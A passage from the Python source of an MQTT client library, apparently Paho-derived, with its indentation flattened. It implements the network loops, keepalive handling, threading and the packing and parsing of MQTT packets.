return MQTT_ERR_NO_CONN
max_packets = len(self._out_messages) + len(self._in_messages)
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_read()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def loop_write(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Use want_write() to determine if there is data waiting to be written.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_packet) + 1
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_write()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def want_write(self):
"""Call to determine if there is network data waiting to be written.
Useful if you are calling select() yourself rather than using loop().
"""
if self._current_out_packet or len(self._out_packet) > 0:
return True
else:
return False
def loop_misc(self):
"""Process miscellaneous network events. Use in place of calling loop() if you
wish to call select() or equivalent on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
now = time.time()
self._check_keepalive()
if self._last_retry_check+1 < now:
# Only check once a second at most
self._message_retry_check()
self._last_retry_check = now
if self._ping_t > 0 and now - self._ping_t >= self._keepalive:
# client->ping_t != 0 means we are waiting for a pingresp.
# This hasn't happened in the keepalive time so we should disconnect.
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
self._callback_mutex.acquire()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_CONN_LOST
return MQTT_ERR_SUCCESS
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way
through their network flow at once. Defaults to 20."""
if inflight < 0:
raise ValueError('Invalid inflight.')
self._max_inflight_messages = inflight
def message_retry_set(self, retry):
"""Set the timeout in seconds before a message with QoS>0 is retried.
20 seconds by default."""
if retry < 0:
raise ValueError('Invalid retry.')
self._message_retry = retry
def user_data_set(self, userdata):
"""Set the user data variable passed to callbacks. May be any data type."""
self._userdata = userdata
def will_set(self, topic, payload=None, qos=0, retain=False):
"""Set a Will to be sent by the broker in case the client disconnects unexpectedly.
This must be called before connect() to have any effect.
topic: The topic that the will message should be published on.
payload: The message to send as a will. If not given, or set to None a
zero length message will be used as the will. Passing an int or float
will result in the payload being converted to a string representing
that number. If you wish to send a true int/float, use struct.pack() to
create the payload you require.
qos: The quality of service level to use for the will.
retain: If set to true, the will message will be set as the "last known
good"/retained message for the topic.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length.
"""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str):
self._will_payload = payload.encode('utf-8')
elif isinstance(payload, bytearray):
self._will_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
self._will_payload = str(payload)
elif payload is None:
self._will_payload = None
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
self._will = True
self._will_topic = topic.encode('utf-8')
self._will_qos = qos
self._will_retain = retain
def will_clear(self):
""" Removes a will that was previously configured with will_set().
Must be called before connect() to have any effect."""
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
def socket(self):
"""Return the socket or ssl object for this client."""
if self._ssl:
if self._useSecuredWebsocket:
return self._ssl.getSSLSocket()
else:
return self._ssl
else:
return self._sock
def loop_forever(self, timeout=1.0, max_packets=1, retry_first_connection=False):
"""This function call loop() for you in an infinite blocking loop. It
is useful for the case where you only want to run the MQTT client loop
in your program.
loop_forever() will handle reconnecting for you. If you call
disconnect() in a callback it will return.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
retry_first_connection: Should the first connection attempt be retried on failure.
Raises socket.error on first connection failures unless retry_first_connection=True
"""
run = True
while run:
if self._state == mqtt_cs_connect_async:
try:
self.reconnect()
except socket.error:
if not retry_first_connection:
raise
self._easy_log(MQTT_LOG_DEBUG, "Connection failed, retrying")
self._backoffCore.backOff()
# time.sleep(1)
else:
break
while run:
rc = MQTT_ERR_SUCCESS
while rc == MQTT_ERR_SUCCESS:
rc = self.loop(timeout, max_packets)
# We don't need to worry about locking here, because we've
# either called loop_forever() when in single threaded mode, or
# in multi threaded mode when loop_stop() has been called and
# so no other threads can access _current_out_packet,
# _out_packet or _messages.
if (self._thread_terminate is True
and self._current_out_packet is None
and len(self._out_packet) == 0
and len(self._out_messages) == 0):
rc = 1
run = False
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True:
run = False
self._state_mutex.release()
else:
self._state_mutex.release()
self._backoffCore.backOff()
# time.sleep(1)
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True:
run = False
self._state_mutex.release()
else:
self._state_mutex.release()
try:
self.reconnect()
except socket.error as err:
pass
return rc
def loop_start(self):
"""This is part of the threaded client interface. Call this once to
start a new thread to process network traffic. This provides an
alternative to repeatedly calling loop() yourself.
"""
if self._thread is not None:
return MQTT_ERR_INVAL
self._thread_terminate = False
self._thread = threading.Thread(target=self._thread_main)
self._thread.daemon = True
self._thread.start()
def loop_stop(self, force=False):
"""This is part of the threaded client interface. Call this once to
stop the network thread previously created with loop_start(). This call
will block until the network thread finishes.
The force parameter is currently ignored.
"""
if self._thread is None:
return MQTT_ERR_INVAL
self._thread_terminate = True
self._thread.join()
self._thread = None
def message_callback_add(self, sub, callback):
"""Register a message callback for a specific topic.
Messages that match 'sub' will be passed to 'callback'. Any
non-matching messages will be passed to the default on_message
callback.
Call multiple times with different 'sub' to define multiple topic
specific callbacks.
Topic specific callbacks may be removed with
message_callback_remove()."""
if callback is None or sub is None:
raise ValueError("sub and callback must both be defined.")
self._callback_mutex.acquire()
for i in range(0, len(self.on_message_filtered)):
if self.on_message_filtered[i][0] == sub:
self.on_message_filtered[i] = (sub, callback)
self._callback_mutex.release()
return
self.on_message_filtered.append((sub, callback))
self._callback_mutex.release()
def message_callback_remove(self, sub):
"""Remove a message callback previously registered with
message_callback_add()."""
if sub is None:
raise ValueError("sub must defined.")
self._callback_mutex.acquire()
for i in range(0, len(self.on_message_filtered)):
if self.on_message_filtered[i][0] == sub:
self.on_message_filtered.pop(i)
self._callback_mutex.release()
return
self._callback_mutex.release()
# ============================================================
# Private functions
# ============================================================
def _loop_rc_handle(self, rc):
if rc:
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
self._state_mutex.release()
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
return rc
def _packet_read(self):
# This gets called if pselect() indicates that there is network data
# available - ie. at least one byte. What we do depends on what data we
# already have.
# If we've not got a command, attempt to read one and save it. This should
# always work because it's only a single byte.
# Then try to read the remaining length. This may fail because it is may
# be more than one byte - will need to save data pending next read if it
# does fail.
# Then try to read the remaining payload, where 'payload' here means the
# combined variable header and actual payload. This is the most likely to
# fail due to longer length, so save current data and current position.
# After all data is read, send to _mqtt_handle_packet() to deal with.
# Finally, free the memory and reset everything to starting conditions.
if self._in_packet['command'] == 0:
try:
if self._ssl:
command = self._ssl.read(1)
else:
command = self._sock.recv(1)
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
if len(command) == 0:
return 1
command = struct.unpack("!B", command)
self._in_packet['command'] = command[0]
if self._in_packet['have_remaining'] == 0:
# Read remaining
# Algorithm for decoding taken from pseudo code at
# http://publib.boulder.ibm.com/infocenter/wmbhelp/v6r0m0/topic/com.ibm.etools.mft.doc/ac10870_.htm
while True:
try:
if self._ssl:
byte = self._ssl.read(1)
else:
byte = self._sock.recv(1)
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
byte = struct.unpack("!B", byte)
byte = byte[0]
self._in_packet['remaining_count'].append(byte)
# Max 4 bytes length for remaining length as defined by protocol.
# Anything more likely means a broken/malicious client.
if len(self._in_packet['remaining_count']) > 4:
return MQTT_ERR_PROTOCOL
self._in_packet['remaining_length'] = self._in_packet['remaining_length'] + (byte & 127)*self._in_packet['remaining_mult']
self._in_packet['remaining_mult'] = self._in_packet['remaining_mult'] * 128
if (byte & 128) == 0:
break
self._in_packet['have_remaining'] = 1
self._in_packet['to_process'] = self._in_packet['remaining_length']
while self._in_packet['to_process'] > 0:
try:
if self._ssl:
data = self._ssl.read(self._in_packet['to_process'])
else:
data = self._sock.recv(self._in_packet['to_process'])
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
self._in_packet['to_process'] = self._in_packet['to_process'] - len(data)
self._in_packet['packet'] = self._in_packet['packet'] + data
# All data for this packet is read.
self._in_packet['pos'] = 0
rc = self._packet_handle()
# Free data and reset values
self._in_packet = dict(
command=0,
have_remaining=0,
remaining_count=[],
remaining_mult=1,
remaining_length=0,
packet=b"",
to_process=0,
pos=0)
self._msgtime_mutex.acquire()
self._last_msg_in = time.time()
self._msgtime_mutex.release()
return rc
def _packet_write(self):
self._current_out_packet_mutex.acquire()
while self._current_out_packet:
packet = self._current_out_packet
try:
if self._ssl:
write_length = self._ssl.write(packet['packet'][packet['pos']:])
else:
write_length = self._sock.send(packet['packet'][packet['pos']:])
except AttributeError:
self._current_out_packet_mutex.release()
return MQTT_ERR_SUCCESS
except socket.error as err:
self._current_out_packet_mutex.release()
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
if write_length > 0:
packet['to_process'] = packet['to_process'] - write_length
packet['pos'] = packet['pos'] + write_length
if packet['to_process'] == 0:
if (packet['command'] & 0xF0) == PUBLISH and packet['qos'] == 0:
self._callback_mutex.acquire()
if self.on_publish:
self._in_callback = True
self.on_publish(self, self._userdata, packet['mid'])
self._in_callback = False
self._callback_mutex.release()
if (packet['command'] & 0xF0) == DISCONNECT:
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, 0)
self._in_callback = False
self._callback_mutex.release()
if self._ssl:
self._ssl.close()
self._ssl = None
if self._sock:
self._sock.close()
self._sock = None
return MQTT_ERR_SUCCESS
self._out_packet_mutex.acquire()
if len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
else:
self._current_out_packet = None
self._out_packet_mutex.release()
else:
pass # FIXME
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
return MQTT_ERR_SUCCESS
def _easy_log(self, level, buf):
if self.on_log:
self.on_log(self, self._userdata, level, buf)
def _check_keepalive(self):
now = time.time()
self._msgtime_mutex.acquire()
last_msg_out = self._last_msg_out
last_msg_in = self._last_msg_in
self._msgtime_mutex.release()
if (self._sock is not None or self._ssl is not None) and (now - last_msg_out >= self._keepalive or now - last_msg_in >= self._keepalive):
if self._state == mqtt_cs_connected and self._ping_t == 0:
self._send_pingreq()
self._msgtime_mutex.acquire()
self._last_msg_out = now
self._last_msg_in = now
self._msgtime_mutex.release()
else:
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
def _mid_generate(self):
self._last_mid = self._last_mid + 1
if self._last_mid == 65536:
self._last_mid = 1
return self._last_mid
def _topic_wildcard_len_check(self, topic):
# Search for + or # in a topic. Return MQTT_ERR_INVAL if found.
# Also returns MQTT_ERR_INVAL if the topic string is too long.
# Returns MQTT_ERR_SUCCESS if everything is fine.
if '+' in topic or '#' in topic or len(topic) == 0 or len(topic) > 65535:
return MQTT_ERR_INVAL
else:
return MQTT_ERR_SUCCESS
def _send_pingreq(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGREQ")
rc = self._send_simple_command(PINGREQ)
if rc == MQTT_ERR_SUCCESS:
self._ping_t = time.time()
return rc
def _send_pingresp(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGRESP")
return self._send_simple_command(PINGRESP)
def _send_puback(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBACK (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBACK, mid, False)
def _send_pubcomp(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBCOMP (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBCOMP, mid, False)
def _pack_remaining_length(self, packet, remaining_length):
remaining_bytes = []
while True:
byte = remaining_length % 128
remaining_length = remaining_length // 128
# If there are more digits to encode, set the top bit of this digit
if remaining_length > 0:
byte = byte | 0x80
remaining_bytes.append(byte)
packet.extend(struct.pack("!B", byte))
if remaining_length == 0:
# FIXME - this doesn't deal with incorrectly large payloads
return packet
def _pack_str16(self, packet, data):
if sys.version_info[0] < 3:
if isinstance(data, bytearray):
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
elif isinstance(data, str):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
elif isinstance(data, unicode):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
else:
raise TypeError
else:
if isinstance(data, bytearray) or isinstance(data, bytes):
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
elif isinstance(data, str):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
else:
raise TypeError
def _send_publish(self, mid, topic, payload=None, qos=0, retain=False, dup=False):
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
utopic = topic.encode('utf-8')
command = PUBLISH | ((dup&0x1)<<3) | (qos<<1) | retain
packet = bytearray()
packet.extend(struct.pack("!B", command))
if payload is None:
remaining_length = 2+len(utopic)
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+topic+"' (NULL payload)")
else:
if isinstance(payload, str):
upayload = payload.encode('utf-8')
payloadlen = len(upayload)
elif isinstance(payload, bytearray):
payloadlen = len(payload)
elif isinstance(payload, unicode):
upayload = payload.encode('utf-8')
payloadlen = len(upayload)
remaining_length = 2+len(utopic) + payloadlen
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+topic+"', ... ("+str(payloadlen)+" bytes)")
if qos > 0:
# For message id
remaining_length = remaining_length + 2
self._pack_remaining_length(packet, remaining_length)
self._pack_str16(packet, topic)
if qos > 0:
# For message id
packet.extend(struct.pack("!H", mid))
if payload is not None:
if isinstance(payload, str):
pack_format = str(payloadlen) + "s"
packet.extend(struct.pack(pack_format, upayload))
elif isinstance(payload, bytearray):
packet.extend(payload)
elif isinstance(payload, unicode):
pack_format = str(payloadlen) + "s"
packet.extend(struct.pack(pack_format, upayload))
else:
raise TypeError('payload must be a string, unicode or a bytearray.')
return self._packet_queue(PUBLISH, packet, mid, qos)
def _send_pubrec(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREC (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREC, mid, False)
def _send_pubrel(self, mid, dup=False):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREL (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREL|2, mid, dup)
def _send_command_with_mid(self, command, mid, dup):
# For PUBACK, PUBCOMP, PUBREC, and PUBREL
if dup:
command = command | 8
remaining_length = 2
packet = struct.pack('!BBH', command, remaining_length, mid)
return self._packet_queue(command, packet, mid, 1)
def _send_simple_command(self, command):
# For DISCONNECT, PINGREQ and PINGRESP
remaining_length = 0
packet = struct.pack('!BB', command, remaining_length)
return self._packet_queue(command, packet, 0, 0)
def _send_connect(self, keepalive, clean_session):
if self._protocol == MQTTv31:
protocol = PROTOCOL_NAMEv31
proto_ver = 3
else:
protocol = PROTOCOL_NAMEv311
proto_ver = 4
remaining_length = 2+len(protocol) + 1+1+2 + 2+len(self._client_id)
connect_flags = 0
if clean_session:
connect_flags = connect_flags | 0x02
if self._will:
if self._will_payload is not None:
remaining_length = remaining_length + 2+len(self._will_topic) + 2+len(self._will_payload)
else:
remaining_length = remaining_length + 2+len(self._will_topic) + 2
connect_flags = connect_flags | 0x04 | ((self._will_qos&0x03) << 3) | ((self._will_retain&0x01) << 5)
if self._username:
remaining_length = remaining_length + 2+len(self._username)
connect_flags = connect_flags | 0x80
if self._password:
connect_flags = connect_flags | 0x40
remaining_length = remaining_length + 2+len(self._password)
command = CONNECT
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
packet.extend(struct.pack("!H"+str(len(protocol))+"sBBH", len(protocol), protocol, proto_ver, connect_flags, keepalive))
self._pack_str16(packet, self._client_id)
if self._will:
self._pack_str16(packet, self._will_topic)
if self._will_payload is None or len(self._will_payload) == 0:
packet.extend(struct.pack("!H", 0))
else:
self._pack_str16(packet, self._will_payload)
if self._username:
self._pack_str16(packet, self._username)
if self._password:
self._pack_str16(packet, self._password)
self._keepalive = keepalive
return self._packet_queue(command, packet, 0, 0)
def _send_disconnect(self):
return self._send_simple_command(DISCONNECT)
def _send_subscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t[0])+1
command = SUBSCRIBE | (dup<<3) | (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t[0])
packet.extend(struct.pack("B", t[1]))
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _send_unsubscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t)
command = UNSUBSCRIBE | (dup<<3) | (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t)
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _message_retry_check_actual(self, messages, mutex):
mutex.acquire()
now = time.time()
for m in messages:
if m.timestamp + self._message_retry < now:
if m.state == mqtt_ms_wait_for_puback or m.state == mqtt_ms_wait_for_pubrec:
m.timestamp = now
m.dup = True
self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
elif m.state == mqtt_ms_wait_for_pubrel:
m.timestamp = now
m.dup = True
self._send_pubrec(m.mid)
elif m.state == mqtt_ms_wait_for_pubcomp:
m.timestamp = now
m.dup = True
self._send_pubrel(m.mid, True)
mutex.release()
def _message_retry_check(self):
self._message_retry_check_actual(self._out_messages, self._out_message_mutex)
self._message_retry_check_actual(self._in_messages, self._in_message_mutex)
def _messages_reconnect_reset_out(self):
self._out_message_mutex.acquire()
self._inflight_messages = 0
for m in self._out_messages:
m.timestamp = 0
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
if m.qos == 0:
m.state = mqtt_ms_publish
elif m.qos == 1:
#self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_puback:
m.dup = True
m.state = mqtt_ms_publish
elif m.qos == 2:
#self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_pubcomp:
m.state = mqtt_ms_resend_pubrel
m.dup = True
else:
if m.state == mqtt_ms_wait_for_pubrec:
m.dup = True
m.state = mqtt_ms_publish
else:
m.state = mqtt_ms_queued
self._out_message_mutex.release()
def _messages_reconnect_reset_in(self):
self._in_message_mutex.acquire()
for m in self._in_messages:
m.timestamp = 0
if m.qos != 2:
self._in_messages.pop(self._in_messages.index(m))
else:
# Preserve current state
pass
self._in_message_mutex.release()
def _messages_reconnect_reset(self):
self._messages_reconnect_reset_out()
self._messages_reconnect_reset_in()
def _packet_queue(self, command, packet, mid, qos):
mpkt = dict(
command = command,
mid = mid,
qos = qos,
pos = 0,
to_process = len(packet),
packet = packet)
self._out_packet_mutex.acquire()
self._out_packet.append(mpkt)
if self._current_out_packet_mutex.acquire(False):
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
self._current_out_packet_mutex.release()
self._out_packet_mutex.release()
# Write a single byte to sockpairW (connected to sockpairR) to break
# out of select() if in threaded mode.
try:
self._sockpairW.send(sockpair_data)
except socket.error as err:
if err.errno != EAGAIN:
raise
if not self._in_callback and self._thread is None:
return self.loop_write()
else:
return MQTT_ERR_SUCCESS
def _packet_handle(self):
cmd = self._in_packet['command']&0xF0
if cmd == PINGREQ:
return self._handle_pingreq()
elif cmd == PINGRESP:
return self._handle_pingresp()
elif cmd == PUBACK:
return self._handle_pubackcomp("PUBACK")
elif cmd == PUBCOMP:
return self._handle_pubackcomp("PUBCOMP")
elif cmd == PUBLISH:
return self._handle_publish()
elif cmd == PUBREC:
return self._handle_pubrec()
elif cmd == PUBREL:
return self._handle_pubrel()
elif cmd == CONNACK:
return self._handle_connack()
elif cmd == SUBACK:
return self._handle_suback()
elif cmd == UNSUBACK:
return self._handle_unsuback()
else:
# If we don't recognise the command, return an error straight away.
self._easy_log(MQTT_LOG_ERR, "Error: Unrecognised command "+str(cmd))
return MQTT_ERR_PROTOCOL
def _handle_pingreq(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
self._easy_log(MQTT_LOG_DEBUG, "Received PINGREQ")
return self._send_pingresp()
def _handle_pingresp(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
# No longer waiting for a PINGRESP.
self._ping_t = 0
self._easy_log(MQTT_LOG_DEBUG, "Received PINGRESP")
return MQTT_ERR_SUCCESS
def _handle_connack(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
(flags, result) = struct.unpack("!BB", self._in_packet['packet'])
if result == CONNACK_REFUSED_PROTOCOL_VERSION and self._protocol == MQTTv311:
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+"), attempting downgrade to MQTT v3.1.")
# Downgrade to MQTT v3.1
self._protocol = MQTTv31
return self.reconnect()
if result == 0:
self._state = mqtt_cs_connected
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+")")
self._callback_mutex.acquire()
if self.on_connect:
self._in_callback = True
if sys.version_info[0] < 3:
argcount = self.on_connect.func_code.co_argcount
else:
argcount = self.on_connect.__code__.co_argcount
if argcount == 3:
self.on_connect(self, self._userdata, result)
else:
flags_dict = dict()
flags_dict['session present'] = flags & 0x01
self.on_connect(self, self._userdata, flags_dict, result)
self._in_callback = False
self._callback_mutex.release()
# Start counting for stable connection
self._backoffCore.startStableConnectionTimer()
if result == 0:
rc = 0
self._out_message_mutex.acquire()
for m in self._out_messages:
m.timestamp = time.time()
if m.state == mqtt_ms_queued:
self.loop_write() # Process outgoing messages that have just been queued up
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
if m.qos == 0:
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.qos == 1:
if m.state == mqtt_ms_publish:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_puback
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.qos == 2:
if m.state == mqtt_ms_publish:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_pubrec
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.state == mqtt_ms_resend_pubrel:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_pubcomp
self._in_callback = True # Don't call loop_write after _send_pubrel()
rc = self._send_pubrel(m.mid, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
self.loop_write() # Process outgoing messages that have just been queued up
self._out_message_mutex.release()
return rc
elif result > 0 and result < 6:
return MQTT_ERR_CONN_REFUSED
else:
return MQTT_ERR_PROTOCOL
def _handle_suback(self):
self._easy_log(MQTT_LOG_DEBUG, "Received SUBACK")
pack_format = "!H" + str(len(self._in_packet['packet'])-2) + 's'
(mid, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = "!" + "B"*len(packet)
granted_qos = struct.unpack(pack_format, packet)
self._callback_mutex.acquire()
if self.on_subscribe:
self._in_callback = True
self.on_subscribe(self, self._userdata, mid, granted_qos)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_publish(self):
rc = 0
header = self._in_packet['command']
message = MQTTMessage()
message.dup = (header & 0x08)>>3
message.qos = (header & 0x06)>>1
message.retain = (header & 0x01)
pack_format = "!H" + str(len(self._in_packet['packet'])-2) + 's'
(slen, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = '!' + str(slen) + 's' + str(len(packet)-slen) + 's'
(message.topic, packet) = struct.unpack(pack_format, packet)
if len(message.topic) == 0:
return MQTT_ERR_PROTOCOL
if sys.version_info[0] >= 3:
message.topic = message.topic.decode('utf-8')
if message.qos > 0:
pack_format = "!H" + str(len(packet)-2) + 's'
(message.mid, packet) = struct.unpack(pack_format, packet)
message.payload = packet
self._easy_log(
MQTT_LOG_DEBUG,
"Received PUBLISH (d"+str(message.dup)+
", q"+str(message.qos)+", r"+str(message.retain)+
", m"+str(message.mid)+", '"+message.topic+
"', ... ("+str(len(message.payload))+" bytes)")
message.timestamp = time.time()
if message.qos == 0:
self._handle_on_message(message)
return MQTT_ERR_SUCCESS
elif message.qos == 1:
rc = self._send_puback(message.mid)
self._handle_on_message(message)
return rc
elif message.qos == 2:
rc = self._send_pubrec(message.mid)
message.state = mqtt_ms_wait_for_pubrel
self._in_message_mutex.acquire()
self._in_messages.append(message)
self._in_message_mutex.release()
return rc
else:
return MQTT_ERR_PROTOCOL
def _handle_pubrel(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREL (Mid: "+str(mid)+")")
self._in_message_mutex.acquire()
for i in range(len(self._in_messages)):
if self._in_messages[i].mid == mid:
# Only pass the message on if we have removed it from the queue - this
# prevents multiple callbacks for the same message.
self._handle_on_message(self._in_messages[i])
self._in_messages.pop(i)
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
self._out_message_mutex.acquire()
rc = self._update_inflight()
self._out_message_mutex.release()
if rc != MQTT_ERR_SUCCESS:
self._in_message_mutex.release()
return rc
self._in_message_mutex.release()
return self._send_pubcomp(mid)
self._in_message_mutex.release()
return MQTT_ERR_SUCCESS
def _update_inflight(self):
# Dont lock message_mutex here
for m in self._out_messages:
if self._inflight_messages < self._max_inflight_messages:
if m.qos > 0 and m.state == mqtt_ms_queued:
self._inflight_messages = self._inflight_messages + 1
if m.qos == 1:
m.state = mqtt_ms_wait_for_puback
elif m.qos == 2:
m.state = mqtt_ms_wait_for_pubrec
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
else:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def _handle_pubrec(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREC (Mid: "+str(mid)+")")
self._out_message_mutex.acquire()
for m in self._out_messages:
if m.mid == mid:
